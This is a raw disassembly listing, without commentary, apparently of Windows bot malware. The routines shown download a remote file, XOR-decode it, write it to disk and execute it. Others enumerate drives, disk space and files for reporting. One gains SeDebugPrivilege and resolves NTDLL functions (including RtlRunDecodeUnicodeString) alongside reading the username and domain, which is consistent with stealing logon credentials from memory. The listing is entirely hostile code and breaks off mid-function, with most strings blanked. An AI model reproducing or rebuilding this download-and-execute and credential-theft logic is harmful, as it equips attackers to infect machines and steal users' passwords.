var_2C = dword ptr -2Ch
var_24 = byte ptr -24h
var_20 = dword ptr -20h
Memory = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_8 = qword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 510h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov ecx, 0AAh
mov esi, eax
lea edi, [ebp+var_2CC]
push 1
rep movsd
pop edi
xor esi, esi
push esi
mov [eax+2A4h], edi
push esi
push esi
lea eax, [ebp+var_248]
push esi
push eax
push dword_4E41D0
call dword_4E4124 ; InternetOpenUrlA
cmp eax, esi
mov [ebp+var_18], eax
jz loc_417426
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp+Filename]
push 40000000h
push eax
call ds:dword_4F63F4 ; CreateFileA
cmp eax, edi
mov [ebp+var_20], eax
jnb short loc_417061
lea eax, [ebp+Filename]
push eax
lea eax, [ebp+Dst]
push offset asc_44F90C ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_30], esi
jnz short loc_417044
push esi ; int
lea eax, [ebp+Dst]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_2CC] ; int
call sub_409D6C
add esp, 14h
loc_417044: ; CODE XREF: sub_416F9A+88�j
lea eax, [ebp+Dst]
push eax
call sub_415C77
push [ebp+var_48]
call sub_40BAAA
pop ecx
pop ecx
push esi
call ds:dword_4F63D4 ; ExitThread
loc_417061: ; CODE XREF: sub_416F9A+68�j
xor edi, edi
call ds:dword_4F63B0 ; GetTickCount
mov ebx, 7D000h
mov dword ptr [ebp+var_8+4], eax
push ebx ; Size
call _malloc
pop ecx
mov [ebp+Memory], eax
loc_41707B: ; CODE XREF: sub_416F9A+1B4�j
push 200h ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+Dst]
push 200h
push eax
push [ebp+var_18]
call dword_4E412C ; InternetReadFile
cmp [ebp+var_34], esi
jz short loc_4170BF
push [ebp+arg_0]
lea eax, [ebp+Dst]
push eax
call sub_41748C
pop ecx
pop ecx
loc_4170BF: ; CODE XREF: sub_416F9A+112�j
lea eax, [ebp+var_24]
push esi
push eax
lea eax, [ebp+Dst]
push [ebp+arg_0]
push eax
push [ebp+var_20]
call ds:dword_4F63E8 ; WriteFile
cmp edi, ebx
jnb short loc_4170FD
mov eax, ebx
sub eax, edi
cmp eax, [ebp+arg_0]
jbe short loc_4170E7
mov eax, [ebp+arg_0]
loc_4170E7: ; CODE XREF: sub_416F9A+148�j
push eax ; Size
lea eax, [ebp+Dst]
push eax ; Src
mov eax, [ebp+Memory]
add eax, edi
push eax ; Dst
call _memcpy
add esp, 0Ch
loc_4170FD: ; CODE XREF: sub_416F9A+13F�j
add edi, [ebp+arg_0]
cmp [ebp+var_3C], esi
jz short loc_41710A
cmp edi, [ebp+var_3C]
ja short loc_417154
loc_41710A: ; CODE XREF: sub_416F9A+169�j
cmp [ebp+var_44], 1
mov eax, edi
jz short loc_417124
shr eax, 0Ah
push eax
lea eax, [ebp+var_248]
push eax
push offset unk_44F934
jmp short loc_417134
; ---------------------------------------------------------------------------
loc_417124: ; CODE XREF: sub_416F9A+176�j
shr eax, 0Ah
push eax
lea eax, [ebp+var_248]
push eax
push offset asc_44F95C ; "-"
loc_417134: ; CODE XREF: sub_416F9A+188�j
mov eax, [ebp+var_48]
imul eax, 234h
add eax, offset dword_456F28
push eax ; Dest
call _sprintf
add esp, 10h
cmp [ebp+arg_0], esi
ja loc_41707B
loc_417154: ; CODE XREF: sub_416F9A+16E�j
cmp [ebp+var_3C], esi
mov [ebp+var_14], 1
jz short loc_4171A9
cmp edi, [ebp+var_3C]
jz short loc_4171A9
push [ebp+var_3C]
lea eax, [ebp+Dst]
mov [ebp+var_14], esi
push edi
push offset asc_44F984 ; "-"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dst]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_2CC] ; int
call sub_409D6C
lea eax, [ebp+Dst]
push eax
call sub_415C77
add esp, 28h
loc_4171A9: ; CODE XREF: sub_416F9A+1C4�j
; sub_416F9A+1C9�j
call ds:dword_4F63B0 ; GetTickCount
sub eax, dword ptr [ebp+var_8+4]
xor edx, edx
mov ecx, 3E8h
push [ebp+var_20]
div ecx
xor edx, edx
mov ecx, eax
mov eax, edi
inc ecx
div ecx
mov ebx, eax
call ds:dword_4F6370 ; CloseHandle
push [ebp+Memory] ; Memory
call _free
cmp [ebp+var_38], esi
pop ecx
jz short loc_417233
lea eax, [ebp+Filename]
push eax ; Filename
call sub_4010AB
cmp eax, [ebp+var_38]
pop ecx
jz short loc_417233
push [ebp+var_38]
mov [ebp+var_14], esi
push eax
lea eax, [ebp+Dst]
push offset asc_44F9B0 ; "-"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dst]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_2CC] ; int
call sub_409D6C
lea eax, [ebp+Dst]
push eax
call sub_415C77
add esp, 28h
loc_417233: ; CODE XREF: sub_416F9A+241�j
; sub_416F9A+253�j
cmp [ebp+var_14], esi
jz loc_417473
cmp [ebp+var_44], 1
jz loc_41732E
mov dword ptr [ebp+var_8], ebx
mov dword ptr [ebp+var_8+4], esi
fild [ebp+var_8]
push ecx
push ecx
mov dword ptr [ebp+var_8], edi
mov dword ptr [ebp+var_8+4], esi
fmul ds:dbl_43D488
lea eax, [ebp+Filename]
fstp [esp+584h+var_584]
fild [ebp+var_8]
push eax
push ecx
push ecx
lea eax, [ebp+Dst]
fmul ds:dbl_43D488
fstp [esp+590h+var_590]
push offset asc_44F9D8 ; "-"
push eax ; Dest
call _sprintf
add esp, 1Ch
cmp [ebp+var_30], esi
jnz short loc_4172AE
push esi ; int
lea eax, [ebp+Dst]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_2CC] ; int
call sub_409D6C
add esp, 14h
loc_4172AE: ; CODE XREF: sub_416F9A+2F2�j
lea eax, [ebp+Dst]
push eax
call sub_415C77
cmp [ebp+var_40], 1
pop ecx
jnz loc_417473
push 5
push esi
lea eax, [ebp+Filename]
push esi
push eax
push offset aOpen_2 ; "open"
push esi
call dword_4E418C
cmp [ebp+var_30], esi
jnz loc_417473
lea eax, [ebp+Filename]
push eax
lea eax, [ebp+Dst]
push offset asc_44FA18 ; "-"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dst]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_2CC] ; int
call sub_409D6C
lea eax, [ebp+Dst]
push eax
call sub_415C77
add esp, 24h
jmp loc_417473
; ---------------------------------------------------------------------------
loc_41732E: ; CODE XREF: sub_416F9A+2A6�j
mov dword ptr [ebp+var_8], ebx
mov dword ptr [ebp+var_8+4], esi
fild [ebp+var_8]
push ecx
push ecx
mov dword ptr [ebp+var_8], edi
mov dword ptr [ebp+var_8+4], esi
fmul ds:dbl_43D488
lea eax, [ebp+Filename]
fstp [esp+584h+var_584]
fild [ebp+var_8]
push eax
push ecx
push ecx
lea eax, [ebp+Dst]
fmul ds:dbl_43D488
fstp [esp+590h+var_590]
push offset asc_44FA34 ; "-"
push eax ; Dest
call _sprintf
add esp, 1Ch
cmp [ebp+var_30], esi
jnz short loc_417396
push esi ; int
lea eax, [ebp+Dst]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_2CC] ; int
call sub_409D6C
add esp, 14h
loc_417396: ; CODE XREF: sub_416F9A+3DA�j
lea eax, [ebp+Dst]
push eax
call sub_415C77
push 10h ; Size
lea eax, [ebp+var_10]
push esi ; Val
push eax ; Dst
call _memset
push 44h
lea eax, [ebp+var_310]
pop edi
push edi ; Size
push esi ; Val
push eax ; Dst
call _memset
add esp, 1Ch
mov [ebp+var_310], edi
lea eax, [ebp+var_10]
mov [ebp+var_304], offset dword_4EBF00
push 1
mov [ebp+var_2E0], si
pop edi
push eax
lea eax, [ebp+var_310]
push eax
push esi
push esi
push 28h
push esi
push esi
lea eax, [ebp+Filename]
push esi
push eax
push esi
mov [ebp+var_2E4], edi
call ds:dword_4F6374 ; CreateProcessA
cmp eax, edi
jnz short loc_417418
call dword_4E4178 ; WSACleanup
call sub_41912E
push esi
call ds:dword_4F636C ; ExitProcess
loc_417418: ; CODE XREF: sub_416F9A+46A�j
lea eax, [ebp+Filename]
push eax
push offset unk_44FA78
jmp short loc_417432
; ---------------------------------------------------------------------------
loc_417426: ; CODE XREF: sub_416F9A+45�j
lea eax, [ebp+var_248]
push eax
push offset asc_44FAAC ; "-"
loc_417432: ; CODE XREF: sub_416F9A+48A�j
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_30], esi
jnz short loc_417466
push esi ; int
lea eax, [ebp+Dst]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_2CC] ; int
call sub_409D6C
add esp, 14h
loc_417466: ; CODE XREF: sub_416F9A+4AA�j
lea eax, [ebp+Dst]
push eax
call sub_415C77
pop ecx
loc_417473: ; CODE XREF: sub_416F9A+29C�j
; sub_416F9A+325�j ...
push [ebp+var_18]
call dword_4E4254 ; InternetCloseHandle
push [ebp+var_48]
call sub_40BAAA
pop ecx
push esi
call ds:dword_4F63D4 ; ExitThread
sub_416F9A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41748C proc near ; CODE XREF: sub_416F9A+11E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
xor ecx, ecx
cmp [esp+arg_4], ecx
jle short locret_4174A8
loc_417498: ; CODE XREF: sub_41748C+1A�j
mov dl, byte_440090
xor [ecx+eax], dl
inc ecx
cmp ecx, [esp+arg_4]
jl short loc_417498
locret_4174A8: ; CODE XREF: sub_41748C+A�j
retn
sub_41748C endp
; =============== S U B R O U T I N E =======================================
sub_4174A9 proc near ; CODE XREF: sub_401CC7+5991�p
; sub_401CC7+5AC6�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_422240
pop ecx
pop ecx
xor ecx, ecx
cmp eax, 0FFFFFFFFh
setnz cl
mov eax, ecx
retn
sub_4174A9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4174C3 proc near ; CODE XREF: sub_410423+458�p
; sub_410423+5FD�p ...
var_38 = byte ptr -38h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
and [ebp+var_4], 0
push ebx
push esi
push edi
push 32h ; Size
mov edi, offset dword_4EBF04
push 0 ; Val
push edi ; Dst
call _memset
mov ebx, [ebp+arg_0]
add esp, 0Ch
lea esi, [ebp+var_38]
loc_4174E8: ; CODE XREF: sub_4174C3+5B�j
; sub_4174C3+61�j
push 0
push 0Ah
push [ebp+arg_4]
push ebx
call __aullrem
push 0
push 0Ah
push [ebp+arg_4]
add al, 30h
mov [esi], al
inc esi
push ebx
call __aulldiv
mov ebx, eax
or eax, edx
mov [ebp+arg_4], edx
jz short loc_417526
inc [ebp+var_4]
push 3
mov eax, [ebp+var_4]
pop ecx
cdq
idiv ecx
test edx, edx
jnz short loc_4174E8
mov byte ptr [esi], 2Ch
inc esi
jmp short loc_4174E8
; ---------------------------------------------------------------------------
loc_417526: ; CODE XREF: sub_4174C3+4B�j
dec esi
mov eax, edi
loc_417529: ; CODE XREF: sub_4174C3+73�j
lea ecx, [ebp+var_38]
cmp esi, ecx
jb short loc_417538
mov cl, [esi]
mov [eax], cl
inc eax
dec esi
jmp short loc_417529
; ---------------------------------------------------------------------------
loc_417538: ; CODE XREF: sub_4174C3+6B�j
and byte ptr [eax], 0
mov eax, edi
pop edi
pop esi
pop ebx
leave
retn
sub_4174C3 endp
; =============== S U B R O U T I N E =======================================
sub_417542 proc near ; CODE XREF: sub_417703+51�p
; sub_417703+87�p
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_4E4280 ; GetDriveTypeA
sub eax, 0
jz short loc_417585
dec eax
jz short loc_41757F
dec eax
dec eax
jz short loc_417579
dec eax
jz short loc_417573
dec eax
jz short loc_41756D
dec eax
jz short loc_417567
mov eax, offset dword_44FB04
retn
; ---------------------------------------------------------------------------
loc_417567: ; CODE XREF: sub_417542+1D�j
mov eax, offset off_44FB00
retn
; ---------------------------------------------------------------------------
loc_41756D: ; CODE XREF: sub_417542+1A�j
mov eax, offset aCdrom ; "Cdrom"
retn
; ---------------------------------------------------------------------------
loc_417573: ; CODE XREF: sub_417542+17�j
mov eax, offset aNetwork ; "Network"
retn
; ---------------------------------------------------------------------------
loc_417579: ; CODE XREF: sub_417542+14�j
mov eax, offset aDisk ; "Disk"
retn
; ---------------------------------------------------------------------------
loc_41757F: ; CODE XREF: sub_417542+10�j
mov eax, offset aInvalid ; "Invalid"
retn
; ---------------------------------------------------------------------------
loc_417585: ; CODE XREF: sub_417542+D�j
mov eax, offset aUnknown ; "Unknown"
retn
sub_417542 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41758B proc near ; CODE XREF: sub_4175D3+12�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 18h
or eax, 0FFFFFFFFh
mov [ebp+var_18], eax
mov [ebp+var_14], eax
mov [ebp+var_10], eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
mov [ebp+var_4], eax
mov eax, dword_4E4110
test eax, eax
jz short loc_4175C0
lea ecx, [ebp+var_10]
push ecx
lea ecx, [ebp+var_8]
push ecx
lea ecx, [ebp+var_18]
push ecx
push [ebp+arg_4]
call eax ; GetDiskFreeSpaceExA
loc_4175C0: ; CODE XREF: sub_41758B+22�j
mov eax, [ebp+arg_0]
push esi
push edi
push 6
pop ecx
lea esi, [ebp+var_18]
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_41758B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4175D3 proc near ; CODE XREF: sub_417703+17�p
; sub_41B964+1F3�p
Dest = byte ptr -198h
var_118 = byte ptr -118h
var_98 = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 198h
push esi
push edi
push [ebp+arg_4]
lea eax, [ebp+var_18]
push eax
call sub_41758B
pop ecx
mov esi, eax
pop ecx
lea edi, [ebp+var_18]
push 6
pop ecx
rep movsd
mov eax, [ebp+var_18]
and eax, [ebp+var_14]
cmp eax, 0FFFFFFFFh
jz loc_4176B6
mov eax, [ebp+var_10]
and eax, [ebp+var_C]
cmp eax, 0FFFFFFFFh
jz loc_4176B6
mov eax, [ebp+var_8]
and eax, [ebp+var_4]
cmp eax, 0FFFFFFFFh
jz loc_4176B6
mov edi, 400h
push 0
push edi
push [ebp+var_14]
push [ebp+var_18]
call __alldiv
push edx
push eax
call sub_4174C3
pop ecx
mov esi, 80h
pop ecx
push eax
push offset aSkb ; "%sKB"
lea eax, [ebp+Dest]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
push 0
push edi
push [ebp+var_C]
push [ebp+var_10]
call __alldiv
push edx
push eax
call sub_4174C3
pop ecx
pop ecx
push eax
push offset aSkb_0 ; "%sKB"
lea eax, [ebp+var_118]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
push 0
push edi
push [ebp+var_4]
push [ebp+var_8]
call __alldiv
push edx
push eax
call sub_4174C3
pop ecx
pop ecx
push eax
push offset aSkb_1 ; "%sKB"
lea eax, [ebp+var_98]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
jmp short loc_4176EF
; ---------------------------------------------------------------------------
loc_4176B6: ; CODE XREF: sub_4175D3+2C�j
; sub_4175D3+3B�j ...
lea eax, [ebp+Dest]
push offset aFailed ; "failed"
push eax ; Dest
call _sprintf
pop ecx
lea eax, [ebp+var_118]
pop ecx
push offset aFailed_0 ; "failed"
push eax ; Dest
call _sprintf
pop ecx
lea eax, [ebp+var_98]
pop ecx
push offset aFailed_1 ; "failed"
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_4176EF: ; CODE XREF: sub_4175D3+E1�j
mov eax, [ebp+arg_0]
push 60h
pop ecx
lea esi, [ebp+Dest]
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_4175D3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_417703(int,char *Str,int,int)
sub_417703 proc near ; CODE XREF: sub_4177D5+17�p
; sub_4177D5+60�p
Dest = byte ptr -500h
var_300 = byte ptr -300h
var_180 = byte ptr -180h
var_100 = byte ptr -100h
Str1 = byte ptr -80h
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 500h
push ebx
mov ebx, [ebp+arg_C]
push esi
push edi
lea eax, [ebp+var_300]
push ebx
push eax
call sub_4175D3
push 60h
mov esi, eax
pop ecx
lea edi, [ebp+var_300]
rep movsd
push 60h
lea esi, [ebp+var_300]
pop ecx
lea edi, [ebp+var_180]
lea eax, [ebp+Str1]
push offset aFailed_2 ; "failed"
rep movsd
push eax ; Str1
call _strcmp
add esp, 10h
test eax, eax
jnz short loc_417776
push ebx
push ebx
call sub_417542
pop ecx
push eax
push offset asc_44FB40 ; "-"
lea eax, [ebp+Dest]
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 14h
jmp short loc_4177AA
; ---------------------------------------------------------------------------
loc_417776: ; CODE XREF: sub_417703+4D�j
lea eax, [ebp+var_180]
push eax
lea eax, [ebp+var_100]
push eax
lea eax, [ebp+Str1]
push eax
push ebx
push ebx
call sub_417542
pop ecx
push eax
push offset asc_44FB7C ; "-"
lea eax, [ebp+Dest]
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 20h
loc_4177AA: ; CODE XREF: sub_417703+71�j
push 1 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409D6C
lea eax, [ebp+Dest]
push eax
call sub_415C77
add esp, 18h
pop edi
pop esi
pop ebx
leave
retn
sub_417703 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4177D5(int,char *Str,int,int)
sub_4177D5 proc near ; CODE XREF: sub_401CC7+2548�p
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
xor ebx, ebx
cmp [ebp+arg_C], ebx
jz short loc_4177F6
push [ebp+arg_C] ; int
push [ebp+arg_8] ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_417703
add esp, 10h
jmp short loc_417857
; ---------------------------------------------------------------------------
loc_4177F6: ; CODE XREF: sub_4177D5+9�j
push esi
push edi
push ebx
push ebx
call dword_4E4188 ; GetLogicalDriveStringsA
lea esi, [eax+2]
push esi ; Size
call _malloc
pop ecx
mov edi, eax
push edi
push esi
call dword_4E4188 ; GetLogicalDriveStringsA
cmp [edi], bl
mov esi, edi
jz short loc_41784E
loc_41781A: ; CODE XREF: sub_4177D5+77�j
push offset aA_1 ; "A:\\"
push esi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_41783D
push esi ; int
push [ebp+arg_8] ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_417703
add esp, 10h
loc_41783D: ; CODE XREF: sub_4177D5+54�j
push esi ; Str
call _strlen
cmp [esi+eax+1], bl
lea esi, [esi+eax+1]
pop ecx
jnz short loc_41781A
loc_41784E: ; CODE XREF: sub_4177D5+43�j
push edi ; Memory
call _free
pop ecx
pop edi
pop esi
loc_417857: ; CODE XREF: sub_4177D5+1F�j
pop ebx
pop ebp
retn
sub_4177D5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41785A proc near ; DATA XREF: sub_401CC7+69F1�o
Dest = byte ptr -49Ch
var_29C = dword ptr -29Ch
var_298 = byte ptr -298h
var_218 = dword ptr -218h
var_115 = byte ptr -115h
Str = byte ptr -114h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 49Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov ecx, 0A7h
mov esi, eax
lea edi, [ebp+var_29C]
rep movsd
mov dword ptr [eax+298h], 1
lea eax, [ebp+Str]
push eax ; Str
call _strlen
xor ebx, ebx
cmp [ebp+eax+var_115], 5Ch
pop ecx
jnz short loc_4178AF
lea eax, [ebp+Str]
push eax ; Str
call _strlen
pop ecx
mov [ebp+eax+var_115], bl
loc_4178AF: ; CODE XREF: sub_41785A+3F�j
lea eax, [ebp+var_218]
push eax
push offset asc_44FBBC ; "-"
lea eax, [ebp+Dest]
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 10h
cmp [ebp+var_8], ebx
jnz short loc_4178F4
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+var_C] ; int
push eax ; int
lea eax, [ebp+var_298]
push eax ; Str
push [ebp+var_29C] ; int
call sub_409D6C
add esp, 14h
loc_4178F4: ; CODE XREF: sub_41785A+78�j
lea eax, [ebp+Str]
push ebx ; int
push eax ; int
lea eax, [ebp+var_218]
push eax ; int
lea eax, [ebp+var_298]
push [ebp+var_C] ; int
push eax ; Str
push [ebp+var_29C] ; int
call sub_417975
add esp, 18h
push eax
lea eax, [ebp+Dest]
push offset asc_44FBE4 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz short loc_417955
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+var_C] ; int
push eax ; int
lea eax, [ebp+var_298]
push eax ; Str
push [ebp+var_29C] ; int
call sub_409D6C
add esp, 14h
loc_417955: ; CODE XREF: sub_41785A+D9�j
lea eax, [ebp+Dest]
push eax
call sub_415C77
push [ebp+var_10]
call sub_40BAAA
pop ecx
pop ecx
push ebx
call ds:dword_4F63D4 ; ExitThread
pop edi
pop esi
pop ebx
sub_41785A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_417975(int,char *Str,int,int,int,int)
sub_417975 proc near ; CODE XREF: sub_41785A+B9�p
; sub_417975+9C�p
var_548 = dword ptr -548h
var_348 = dword ptr -348h
Dest = byte ptr -244h
var_140 = byte ptr -140h
var_114 = byte ptr -114h
var_113 = byte ptr -113h
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 548h
push ebx
push esi
push edi
mov esi, 104h
push [ebp+arg_10]
lea eax, [ebp+Dest]
push offset aS_29 ; "%s\\*"
push esi ; Count
push eax ; Dest
call __snprintf
mov edi, ds:dword_4F6424
add esp, 10h
lea eax, [ebp+var_140]
push eax
lea eax, [ebp+Dest]
push eax
call edi ; FindFirstFileA
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_417A2E
loc_4179BB: ; CODE XREF: sub_417975+B7�j
test [ebp+var_140], 10h
jz short loc_417A1C
cmp [ebp+var_114], 2Eh
jnz short loc_4179DF
cmp [ebp+var_113], 0
jz short loc_417A1C
cmp [ebp+var_113], 2Eh
jz short loc_417A1C
loc_4179DF: ; CODE XREF: sub_417975+56�j
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_348]
push [ebp+arg_10]
push offset aSS_9 ; "%s\\%s"
push esi ; Count
push eax ; Dest
call __snprintf
push [ebp+arg_14] ; int
lea eax, [ebp+var_348]
push eax ; int
push [ebp+arg_C] ; int
push [ebp+arg_8] ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_417975
add esp, 2Ch
mov [ebp+arg_14], eax
loc_417A1C: ; CODE XREF: sub_417975+4D�j
; sub_417975+5F�j ...
lea eax, [ebp+var_140]
push eax
push ebx
call ds:dword_4F6420 ; FindNextFileA
test eax, eax
jnz short loc_4179BB
loc_417A2E: ; CODE XREF: sub_417975+44�j
push ebx
mov ebx, ds:dword_4F6414
call ebx ; FindClose
push [ebp+arg_C]
lea eax, [ebp+Dest]
push [ebp+arg_10]
push offset aSS_10 ; "%s\\%s"
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 14h
lea eax, [ebp+var_140]
push eax
lea eax, [ebp+Dest]
push eax
call edi ; FindFirstFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_417AB8
loc_417A69: ; CODE XREF: sub_417975+141�j
lea eax, [ebp+var_114]
inc [ebp+arg_14]
push eax
lea eax, [ebp+var_548]
push [ebp+arg_10]
push offset asc_44FC1C ; "-"
push 200h ; Count
push eax ; Dest
call __snprintf
push 1 ; int
lea eax, [ebp+var_548]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409D6C
add esp, 28h
lea eax, [ebp+var_140]
push eax
push esi
call ds:dword_4F6420 ; FindNextFileA
test eax, eax
jnz short loc_417A69
loc_417AB8: ; CODE XREF: sub_417975+F2�j
push esi
call ebx ; FindClose
mov eax, [ebp+arg_14]
pop edi
pop esi
pop ebx
leave
retn
sub_417975 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417AC3 proc near ; DATA XREF: sub_401CC7+1C8C�o
Dest = byte ptr -29Ch
var_9C = dword ptr -9Ch
Str = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 29Ch
mov eax, [ebp+arg_0]
push esi
push edi
push 25h
pop ecx
mov esi, eax
lea edi, [ebp+var_9C]
push 1
rep movsd
pop esi
mov [eax+90h], esi
call sub_41B810
cmp eax, esi
mov [ebp+var_4], eax
jz short loc_417B02
cmp eax, 2
jz short loc_417B02
push offset unk_44FE1C
jmp loc_417C41
; ---------------------------------------------------------------------------
loc_417B02: ; CODE XREF: sub_417AC3+2E�j
; sub_417AC3+33�j
push esi
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_41A556
pop ecx
test eax, eax
pop ecx
jz loc_417C3C
push ebx
push offset aNtdll_dll ; "NTDLL.DLL"
call ds:dword_4F63C0 ; LoadLibraryA
mov esi, ds:dword_4F63C4
mov edi, eax
push offset aNtquerysystemi ; "NtQuerySystemInformation"
push edi
mov [ebp+var_8], edi
call esi ; GetProcAddress
push offset aRtlcreatequery ; "RtlCreateQueryDebugBuffer"
push edi
mov dword_4ED148, eax
call esi ; GetProcAddress
push offset aRtlqueryproces ; "RtlQueryProcessDebugInformation"
push edi
mov dword_4ED13C, eax
call esi ; GetProcAddress
push offset aRtldestroyquer ; "RtlDestroyQueryDebugBuffer"
push edi
mov dword_4ED34C, eax
call esi ; GetProcAddress
push offset aRtlrundecodeun ; "RtlRunDecodeUnicodeString"
push edi
mov dword_4ED144, eax
call esi ; GetProcAddress
mov dword_4ED140, eax
call sub_417C95
test eax, eax
mov [ebp+arg_0], eax
jz loc_417C0F
mov esi, ds:dword_4F6444
mov edi, 400h
mov ebx, offset word_4EC13C
push edi
push ebx
push offset aUsername ; "USERNAME"
call esi ; GetEnvironmentVariableW
push edi
mov edi, offset word_4EC93C
push edi
push offset aUserdomain ; "USERDOMAIN"
call esi ; GetEnvironmentVariableW
cmp [ebp+var_4], 1
push offset dword_4ED354
push [ebp+arg_0]
jnz short loc_417BBB
call sub_417E1E
jmp short loc_417BC0
; ---------------------------------------------------------------------------
loc_417BBB: ; CODE XREF: sub_417AC3+EF�j
call sub_417FC5
loc_417BC0: ; CODE XREF: sub_417AC3+F6�j
pop ecx
test eax, eax
pop ecx
jz short loc_417C08
cmp dword_4ED354, 0
jnz short loc_417BEF
push ebx
push edi
push [ebp+arg_0]
lea eax, [ebp+Dest]
push offset asc_44FD14 ; "-"
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 18h
jmp short loc_417C22
; ---------------------------------------------------------------------------
loc_417BEF: ; CODE XREF: sub_417AC3+10A�j
cmp [ebp+var_4], 1
push [ebp+arg_0]
jnz short loc_417BFF
call sub_4180FB
jmp short loc_417C04
; ---------------------------------------------------------------------------
loc_417BFF: ; CODE XREF: sub_417AC3+133�j
call sub_418192
loc_417C04: ; CODE XREF: sub_417AC3+13A�j
pop ecx
push eax
jmp short loc_417C14
; ---------------------------------------------------------------------------
loc_417C08: ; CODE XREF: sub_417AC3+101�j
push offset unk_44FD70
jmp short loc_417C14
; ---------------------------------------------------------------------------
loc_417C0F: ; CODE XREF: sub_417AC3+B6�j
push offset asc_44FDA8 ; "-"
loc_417C14: ; CODE XREF: sub_417AC3+143�j
; sub_417AC3+14A�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
